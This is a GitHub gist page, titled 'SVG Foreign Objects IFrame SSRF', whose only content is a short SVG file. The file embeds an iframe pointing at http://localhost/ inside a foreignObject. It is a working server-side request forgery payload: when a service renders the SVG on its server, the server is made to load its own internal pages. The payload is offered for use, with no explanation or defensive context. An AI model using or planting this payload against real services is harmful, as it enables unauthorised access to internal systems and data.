Skip to content

Instantly share code, notes, and snippets.

@Splint3r7
Forked from akhil-reni/ssrf_iframe.svg
Created April 5, 2019 09:34
Show Gist options
  • Save Splint3r7/42026d35d282f2e85da07fd791f559a0 to your computer and use it in GitHub Desktop.
Save Splint3r7/42026d35d282f2e85da07fd791f559a0 to your computer and use it in GitHub Desktop.
SVG Foreign Objects IFrame SSRF
Display the source blob
Display the rendered blob
Raw
<svg width="6000" height="6000">
<g>
<foreignObject width="6000" height="6000">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://localhost/"></iframe>
</body>
</foreignObject>
</g>
</svg>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment